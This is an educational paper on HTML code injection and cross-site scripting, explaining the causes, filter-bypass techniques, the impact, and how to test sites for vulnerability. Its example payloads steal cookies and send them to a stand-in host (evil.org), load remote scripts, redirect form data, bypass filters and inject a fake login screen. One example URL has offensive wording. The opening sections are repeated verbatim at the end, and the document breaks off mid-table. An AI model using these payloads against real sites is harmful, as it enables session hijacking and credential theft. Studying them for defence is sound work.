This document discusses HTML code injection and cross-site scripting (XSS) vulnerabilities. It explains that many websites are vulnerable to XSS attacks because they do not properly sanitize user input that gets embedded in dynamically-generated web pages. Attackers can exploit these vulnerabilities to inject malicious scripts that get executed by visitors' browsers. The document provides details on common HTML tags used in these attacks like <SCRIPT> and <EMBED> and advises on securing websites against code injection attacks.
Understanding the cause and effect of CSS (XSS) Vulnerabilities
As web-based applications have become more sophisticated, the types of vulnerabilities that attackers are capable of exploiting have rapidly increased. A particular class of attacks, commonly referred to as "code insertion" and often as "Cross-Site Scripting", has become increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the variety of ways attackers are finding to successfully exploit them is on the increase. Analysis of many sites has indicated that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected.

Introduction

Web servers delivering dynamic content to Internet clients constitute an integral component of most organisations' online service offerings. The ability to tune content and respond to an individual client request represents standard functionality for any successful site. Unfortunately, due to poorly developed application code and data processing systems, the majority of these successful sites are vulnerable to attacks that focus upon the way HTML content is generated and interpreted by client browsers. Attackers are often able to embed malicious HTML-based content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the returned content without the knowledge of the site's visitor.

Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks have increased the importance of correctly handling user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cross-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and to provide advice on securing applications against this type of attack.

Code Insertion

The success of this type of attack hinges upon the functionality of the client browser. In HTML, to distinguish displayable text from the interpreted markup language, some characters are treated specially. One of the most common special characters used to define elements within the markup language is the "<" character, which is typically used to indicate the beginning of an HTML tag. These tags can either affect the formatting of the page or introduce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).

As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script content, it will likely be executed within the context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.

While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag: by inserting the appropriate HTML tag information, an attacker could, for instance, trick visitors to the site into revealing sensitive information by modifying the behaviour of the existing form. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisation's online annual accounts or president's statement).
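As a rough illustration of why the "<" character matters, the sketch below shows user-supplied text being written into a page with its special characters converted to HTML entities, so the browser displays the text instead of interpreting it as a tag. It is a minimal sketch in Python, not something taken from the original paper; the function name render_post and the sample input are hypothetical, and only the standard library call html.escape is used.

```python
import html


def render_post(user_text: str) -> str:
    """Return an HTML fragment that shows user_text as literal text.

    render_post is a hypothetical helper used only for illustration.
    html.escape converts &, <, > (and, with quote=True, both quote
    characters) into their entity forms.
    """
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


if __name__ == "__main__":
    # A posting that tries to smuggle in a scripting tag.
    posting = "Nice site! <SCRIPT>code</SCRIPT>"
    print(render_post(posting))
```

With the entities in place the browser has no tag to interpret, so the text is shown as written. This only covers text placed between tags; values placed inside attributes, URLs or script blocks need handling appropriate to that context.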
It is important to understand the HTML tags that are most commonly used to carry out code insertion attacks. The following table details the most important attributes of these tags. However, it is important to note that alternative in-line scripting elements may be used and interpreted by the current generation of web browsers, such as javascript:alert('executing script').

HTML Tag    Description

<SCRIPT>
    Adds a script that is to be used in the document.
    Attributes:
    * type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the language attribute.
    * language = Identifies the language of the script, such as JavaScript or VBScript.
    * src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only)
    Supported by: Netscape, IE 3+, HTML 4, Opera 3+

<OBJECT>
    Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object.
    Attributes:
    * classid = Identifies the class identifier of the object.
    * codebase = Identifies the URL of the object's codebase.
    * codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
    * data = Specifies the URL of the data used for the object.
    * name = Specifies the name of the object to be referenced by scripts on the page.
    * standby = Specifies the message to display while the object loads.
    * type = Specifies the media type for the data.
    * usemap = Specifies the imagemap URL to use with the object.
    Supported by: Netscape, IE, HTML 4

<APPLET>
    Used to place a Java applet on a document. It is deprecated in the HTML 4.0 specification in favour of the <object> tag.
    Attributes:
    * code = Specifies the class name of the code to be executed (required).
    * codebase = The URL from which the code is retrieved.
    * name = Names the applet for reference elsewhere on the page.
    Supported by: Netscape, IE 3+, HTML 4

<EMBED>
    Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag.
    Attributes:
    * hidden = Hides the media file or player from view when set to yes.
    * name = Specifies the name for the embedded object for later reference within a script.
    * pluginspage = Specifies the URL for information on installing the appropriate plug-in.
    * src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)
    * code = Specifies the class name of the Java code to be executed. (IE only)
    * codebase = Specifies the base URL for the application. (IE only)
    * pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)
    * type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only)
    Supported by: Netscape, IE 3+, Opera 3+

<FORM>
    Indicates the beginning and end of a form.
    Attributes:
    * action = Specifies the URL of the application that will process the form.
    * enctype = Specifies how the values for the form controls are encoded when they are submitted to the server.
    * method = Specifies which HTTP method will be used to submit the form data.
    * target = Specifies a target window for the results of the form submission to be loaded (_blank, _top, _parent, and _self).
    Supported by: All

Malicious Code

An embedded code attack is heavily dependent upon the delivery mechanism. Thus the delivery method often dictates the audience the script will potentially affect.
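To make the tags tabulated above a little more concrete, the following sketch scans a fragment of submitted HTML and reports which of those tags it opens. It is an illustrative Python sketch only: the names RISKY_TAGS, RiskyTagScanner and find_risky_tags are hypothetical, and the standard library html.parser module is assumed to be an acceptable stand-in for however a real application parses its input. Detection of this kind is an audit aid and should not be mistaken for a defence, since many insertion methods do not rely on these tags at all.

```python
from html.parser import HTMLParser

# The tags singled out in the table above (hypothetical constant name).
RISKY_TAGS = {"script", "object", "applet", "embed", "form"}


class RiskyTagScanner(HTMLParser):
    """Collects the names of risky start tags seen in the input."""

    def __init__(self) -> None:
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser reports tag names in lower case.
        if tag in RISKY_TAGS:
            self.found.append(tag)


def find_risky_tags(fragment: str) -> list:
    """Return the risky tag names opened in fragment, in order."""
    scanner = RiskyTagScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.found


if __name__ == "__main__":
    sample = 'Hi <b>there</b> <SCRIPT>code</SCRIPT> <EMBED SRC="a.swf">'
    print(find_risky_tags(sample))
```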
It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Board Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and, later, the use of vector drawing languages that permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt a long time ago to rigorously control the content that could be submitted.

An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user-submitted text from a standard POST form. This data was then added to the discussion page without any further processing. Users often included text formatting tags to bold, italicise or colour their text, giving their message a greater visual impact. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider a user embedding the following two code snippets in their posting, and what the implications would be for everyone viewing the message.

    Hello World! <SCRIPT>malicious code</SCRIPT>

    Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">

Unfortunately, attackers are finding ever more ingenious methods of encoding their embedded attacks, and consequently many more sites are vulnerable.

Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site sends a page back to the browser including the value of criteria, which consequently forces the execution of code from the attacker's server.
For example:

    <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>

In the attack above, one source is inserting code into pages sent by another source. It should be noted that this attack:

* disguises the link as a link to http://trusted.org,
* can be easily included in an HTML email message,
* does not supply the malicious code inline, but downloads it from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.

This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).

Cross Site Scripting

A cross-site scripting vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system. "Cross-Site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions, which can result not only in cookie theft but also in account hijacking, changing of web application account settings, spreading of a webmail worm, etc.

Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.

The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines.
Additionally, a victim doesn't necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

The most popular (and devastating) CSS/XSS attack is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A paper by iDefence explains the process in great detail, but it can be quickly summarised as follows:

1. The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session IDs.
2. The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/account.asp.
3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance:

    <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">

5. Unknown to the victim, the attacker has now received a copy of their cookie information.

The attacker now visits the web site and, by substituting his cookie information with that of the victim, is perceived to be the victim by the server application.

Note that cross-site scripting is commonly referred to as CSS and/or XSS.

Understanding Code Insertion

To date, security professionals have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications.
The following are some of the more common methods for doing so.

Inline Scripting

    http://trusted.org/search.cgi?criteria=<script>code</script>

    http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>

    http://trusted.org/COM2.IMG%20src="Javascript:alert(document.domain)"

Forced Error Responses

    http://trusted.org/<script>code</script>

This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.

    http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>

If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the user's browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.

    http://trusted.org/servlet/org.apache.catalina.servlets.WebdavStatus/<script>code</script>

In the example above, when the Tomcat servlet is called with the trailing illegitimate request, an error page is served containing the offending text verbatim.

Non <SCRIPT> Events

    " [event]='code'

In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into an HTML tag that should have looked like:

    <A HREF="exploit string">Go</A>

resulting in:

    <A HREF="" [event]='code'">Go</A>

An intrinsic event can be attached to most tags, for example:

    <b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>

As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.

JavaScript Entities

    <img src="&{alert('CSS Vulnerable')};">

The special character & (followed by an opening brace) is sometimes interpreted as the start of a new JavaScript code segment (entity).
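The attribute break-out described under "Non <SCRIPT> Events" can be reproduced with plain string handling. The sketch below is illustrative only and is written in Python rather than any language used by the original paper; build_link_unsafe and build_link_escaped are hypothetical helper names. It shows the exploit string closing the HREF value when inserted verbatim, and the same string staying inside the attribute once both quote characters are entity-encoded with the standard html.escape call.

```python
import html


def build_link_unsafe(target: str) -> str:
    """Insert target into the HREF value with no processing (vulnerable)."""
    return '<A HREF="' + target + '">Go</A>'


def build_link_escaped(target: str) -> str:
    """Insert target with &, <, >, " and ' converted to entities."""
    return '<A HREF="' + html.escape(target, quote=True) + '">Go</A>'


if __name__ == "__main__":
    # Exploit string in the form quoted in the text: " [event]='code'
    exploit = "\" onMouseOver='code'"
    print(build_link_unsafe(exploit))   # the event handler becomes an attribute
    print(build_link_escaped(exploit))  # the quotes can no longer close HREF
```

Entity-encoding the quotes addresses only the break-out. A value such as javascript:alert(1) contains no special characters at all, so a link target would also need its scheme checked.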
Typical Payloads Formatting

    <img src = "malicious.js">
    <script>alert('hacked')</script>
    <iframe = "malicious.js">
    <script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>
    <a href="javascript:">click-me</a>

Insertion Example

Dynamic URL Generation

Consider an application built for running on Microsoft's Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS's Active Server Pages (ASP).

Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:

    <A HREF="http://trusted.org/search_main.asp?searchstring=SomeString">click-me</A>

and the ASP code required to generate a further query based upon this submitted information is:

    <%
    var BaseUrl = "http://trusted.org/search2.asp?searchagain=";
    Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>")
    %>

Suppose the attacker replaces SomeString with their own code, as indicated next:

    <a href="http://trusted.org/search_main.asp?SearchString=%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%3B%27">FooBar</a>

The likely result found in the dynamically generated ASP page will be:

    <A HREF="http://trusted.org/search2.asp?searchagain="" onmouseover='ClientForm.action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm.submit;'">click-me</A>

In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker's web site.

Bypassing Anti-CSS Filters

A key function of any application filtering process will be the removal of possibly dangerous special characters. However, in many circumstances it may be difficult to filter a large range of these characters due to the application's unique requirements.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different ways in which special characters can be encoded.

One of the most popular alternative character representations is URL escaped encoding, sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the % character.

    Char   ;    /    ?    :    @    =    &    <    >    "    #
    Code   %3b  %2f  %3f  %3a  %40  %3d  %26  %3c  %3e  %22  %23

    Char   {    }    |    \    ^    ~    [    ]    `    %    '
    Code   %7b  %7d  %7c  %5c  %5e  %7e  %5b  %5d  %60  %25  %27

To better understand the processes behind bypassing Anti-CSS filtering mechanisms, a series of detailed examples are provided below.

Inserting Malicious Code

Simple Filtering of < and >

Many applications that implement some kind of content filtering will typically filter out the < and > characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only is client-side code easy to bypass, in many circumstances the filter itself can be bypassed using a mix of alternative character representations and other special characters.

Consider a routine that removes the < and > special characters:

    document.write(cleanSearchString('<>'));

The attacker now uses an alternative coding for the filtered characters, \x3c and \x3e respectively, and begins their code with ') + to escape out of the routine.

    ') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'

Commenting out malicious code

Consider an application that filters content on behalf of its clients by causing any scripting content to be safely commented out. For instance, <script>code</script> is filtered by the application to become:

    <COMMENT>
    <!--
    code (NOT PARSED BY FILTER)
    //-->
    </COMMENT>

Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example, the attacker can send the following code:

    <script>
    - -->
    </COMMENT>
    <img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/fakeloginscreen.jsp);">
    </script>

After processing by the filter, the following code is embedded in the returned document:

    <COMMENT>
    <!--
    - -->
    </COMMENT>
    <img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/fakeloginscreen.jsp);">
    </COMMENT>

This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML email content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords.

Separate Window Handling

A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window, using the target=_blank addition to the HTML <A HREF> tag. This then causes any malicious code to be executed in the context of a different DOM. Unfortunately, in many online email applications it is possible to bypass this after analysing the harmless link supplied by the site.

Consider a site that parses the content,

    <a href="javascript:">click-me</a>

which, after processing, becomes:

    <a href="javascript:" target="_blank">click-me</a>

causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows,

    <a href="javascript:..." foo="bar>click-me</a>

it will be interpreted as:

    <a href="javascript:..." foo="bar target="_blank">click-me</a>

causing the code to be executed in the same page, under the same DOM.

Escaped JavaScript Entities

In cases where almost all special characters are filtered from user-supplied strings, attackers must encode the entire attack string.

Consider the following URL:

    http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2

The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing in this instance an unexpected JavaScript alert window to pop up, with the text EVIL.
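The decoding step in the escaped-entity example above is easy to verify, and it also shows why a filter needs to look at the decoded form of a value and not the raw request text. The following Python sketch is an illustration under stated assumptions: fully_decode and contains_special are hypothetical helper names, the set of characters checked is an arbitrary sample, and urllib.parse.unquote from the standard library stands in for whatever decoding the server platform performs.

```python
from urllib.parse import unquote

# Characters treated as "special" for this illustration only.
SPECIAL_CHARS = set("<>\"'&{}();")


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly until the value stops changing.

    Repeating the decode catches double-encoded input such as %253C,
    which becomes %3C after one pass and < after two.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def contains_special(value: str) -> bool:
    """Report whether the decoded value holds any special character."""
    return any(ch in SPECIAL_CHARS for ch in fully_decode(value))


if __name__ == "__main__":
    query = "%26%7balert%28%27EVIL%27%29%7d%3b"
    print(fully_decode(query))      # &{alert('EVIL')};
    print(contains_special(query))  # True
```

A check applied to the raw query string would see only letters, digits and percent signs, which is why the encoded attack passes a naive character filter.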
Web Integration

As client web browsers have evolved, they have incorporated an increasingly diverse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of these same browsers. While the security flaw may be HTML injection, and more specifically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, HTML email has now become a popular personalised delivery mechanism. Unfortunately, the delivery methods are becoming so diverse that no single security solution is available to prevent the attack. Consider the significance of the following delivery mechanisms.

The Flash! Attack

Flash! is a popular application for displaying animated visual information. It has its own development language (ActionScript) for creating sophisticated interactive menus, animated movies and games. The most popular web browsers often install the interpreter for these files by default and, due to the large number of sites that use the technology, many people will install the interpreter even if it wasn't originally available with their web browser.

ActionScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.

For instance, instead of:

    getURL("http://www.technicalinfo.net")

it is possible to specify scripting code:

    getURL("javascript:alert(document.cookie)")

Thus, it is possible to embed potentially dangerous scripting elements within a common file format.
The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local web browser security settings.

For an attack to be successful, the dangerous Flash! file (typically terminating in a .swf extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance:

    <EMBED src="http://evil.org/badflash.swf"
        pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
        type="application/x-shockwave-flash"
        width="100" height="100">
    </EMBED>

The Impact

The impact of malicious code insertion is often difficult to quantify and will change as new functionality or interactions are incorporated into both web servers and client browsers. Already, users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Microsoft Help). For this reason, the diversity and impact of potential threats are best illustrated through a series of examples. Consider the following:

* An attacker often has access to the document retrieved since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.
* An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.
* An attacker may be able to poison the site's persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.
* An attacker may be able to cause a hidden window to start on the client machine and use this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.
* CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attacker's code unintentionally. If the attacker references document components on a remote host, the victim's client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on an SSL-capable web server.
* An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.
* An attacker may be able to bypass policies that prevent the victim's browser from executing scripts. For example, Internet Explorer security zones may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.
* An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.
* Even if the victim's web browser does not support scripting, an attacker may still be able to alter the content of the page, affecting its appearance, behaviour or normal operation.

To date the most popular application content to be targeted by attackers has been web pages that:

* Return results based upon user input to search engines,
* Process credit card information,
* Store user-supplied content in databases and cookies for later retrieval.

Vulnerability Checking

Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past.

1. For each visible input field (these may be located in an HTML form, or represented in the URL as variable=), try the most obvious scripting formats:

    <script>alert('CSS Vulnerable')</script>
    <img csstest=javascript:alert('CSS Vulnerable')>
    &{alert('CSS Vulnerable')};

   In any case, should an alert message pop up with the text "CSS Vulnerable", the application component is vulnerable - specifically the input field just checked.

2. If any of the above scripting checks cause the HTML page to display incorrectly, the application component may still be vulnerable.

3. For each visible variable, submit/substitute the following string:

    '';!--"<CSS_Check>=&{()}

   (Note that the string begins with two single-quotes.)

   On the resultant page, search for the string "<CSS_Check>". If you discover "<CSS_Check>", it is quite probable that the application component is vulnerable. However, if the word CSS_Check is now enclosed in something similar to "&lt;CSS_Check&gt;", then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload.

4. Having located the word CSS_Check, verify what (if any) other characters have been altered or filtered from the original string '';!--"<CSS_Check>=&{()}. Depending upon the filtered characters, the application component may still be vulnerable.

5. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above) then there is a high probability that the application component is vulnerable.

6. Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group or WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application.

7. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data. It is a simple process to turn a POST into a GET submission. If the application component fails to respond to the GET the same way as it did for the POST submission, it is probably not vulnerable to a URL based inline scripting attack.

Putting It All Together

To bring together many of the ideas and processes discussed earlier in this document, consider the following example. In this example, the anonymous site has a search engine that responds to client data submissions. Normally the site would look like this:

Taking a closer look at the content source, we notice that our sample code appears 21 times in the document, in various formats.
It appears 10 times in a format similar to: <SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/ anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable') </script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT> 9 times in a format similar to: <a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript %3E&pager.offset=10">2</a> And twice in the format similar to: document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\ "70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>'); Obviously there are three different server-side processing routines for processi ng client search data. 1. In the first type (ad.uk.doubleclick.net format), it appears that the proc essing routine changes the case of characters and changes white space to the und erscore (_). 2. The second type (href=) converts special characters into their escape-enco ded formats, and white space into the + character. 3. The third type (document.writeln) places the complete string within a docu ment.writeln JavaScript routine. Several opportunities present themselves here. To make the site execute the Java Script alert box for each type, we need to force the <script> tags outside of an y other HTML tags. Thus, for each type, the following methods will work: 1. ><script>alert('CSS Vulnerable')</script><b a=a 2. a></a><script>alert('CSS Vulnerable')</script> 3. \'><script>alert%28\'CSS Vulnerable\'%29</script>< The result is the following alert box (multiple times): HTML Code Injection and Cross-site scripting Understanding the cause and effect of CSS (XSS) Vulnerabilities
As web-based applications have become more sophisticated, the types of vulnerabilities that attackers are capable of exploiting have rapidly increased. A particular class of attacks, commonly referred to as "code insertion" and often "Cross-Site Scripting", has become increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the variety of ways attackers are finding to successfully exploit them is on the increase. Analysis of many sites has indicated that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected.

Introduction

Web servers delivering dynamic content to Internet clients constitute an integral component of most organisations' online service offerings. The ability to tune content and respond to an individual client request represents standard functionality for any successful site. Unfortunately, due to poorly developed application code and data processing systems, the majority of these successful sites are vulnerable to attacks that focus upon the way HTML content is generated and interpreted by client browsers. Attackers are often able to embed malicious HTML-based content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the returned content without the knowledge of the site's visitor.

Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks have increased the importance of correctly handling user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cross-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and to provide advice on securing applications against this type of attack.

Code Insertion

The success of this type of attack hinges upon the functionality of the client browser. In HTML, to distinguish displayable text from the interpreted markup language, some characters are treated specially. One of the most common special characters used to define elements within the markup language is the "<" character, which is typically used to indicate the beginning of an HTML tag. These tags can either affect the formatting of the page or introduce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).

As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script content, it will likely be executed within the context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.

While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag: by inserting the appropriate HTML tag information, an attacker could trick visitors to the site into revealing sensitive information, for instance by modifying the behaviour of the existing form. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisation's online annual accounts or president's statement).
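To make the role of the special characters concrete, the following is a minimal sketch of output encoding, assuming the application can pass every piece of user-supplied text through a helper before writing it into a page. The function name escapeHtml and the sample string are hypothetical and are not taken from any particular product or library.

```javascript
// Hypothetical helper: replaces the characters that HTML treats specially
// with character entities, so the browser displays them instead of
// interpreting them as markup.
function escapeHtml(text) {
  const entities = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Illustrative user input containing a script tag.
const submitted = "<SCRIPT>alert('injected')</SCRIPT>";
console.log(escapeHtml(submitted));
// &lt;SCRIPT&gt;alert(&#39;injected&#39;)&lt;/SCRIPT&gt;
```

Encoding of this kind only addresses text placed between tags; values written into attributes, URLs or script blocks need handling appropriate to those contexts.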
It is important to understand the HTML tags that are most commonly used to carry out code insertion attacks. The following table details the most important attributes of these tags. However, it is important to note that alternative in-line scripting elements, such as javascript:alert('executing script'), may be used and interpreted by the current generation of web browsers.

HTML Tag / Description

<SCRIPT>
Adds a script that is to be used in the document.
Attributes:
* type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the language attribute.
* language = Identifies the language of the script, such as JavaScript or VBScript.
* src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only)
Supported by: Netscape, IE 3+, HTML 4, Opera 3+

<OBJECT>
Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object.
Attributes:
* classid = Identifies the class identifier of the object.
* codebase = Identifies the URL of the object's codebase.
* codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
* data = Specifies the URL of the data used for the object.
* name = Specifies the name of the object to be referenced by scripts on the page.
* standby = Specifies the message to display while the object loads.
* type = Specifies the media type for the data.
* usemap = Specifies the imagemap URL to use with the object.
Supported by: Netscape, IE, HTML 4

<APPLET>
Used to place a Java applet on a document. It is deprecated in the HTML 4.0 specification in favour of the <object> tag.
Attributes:
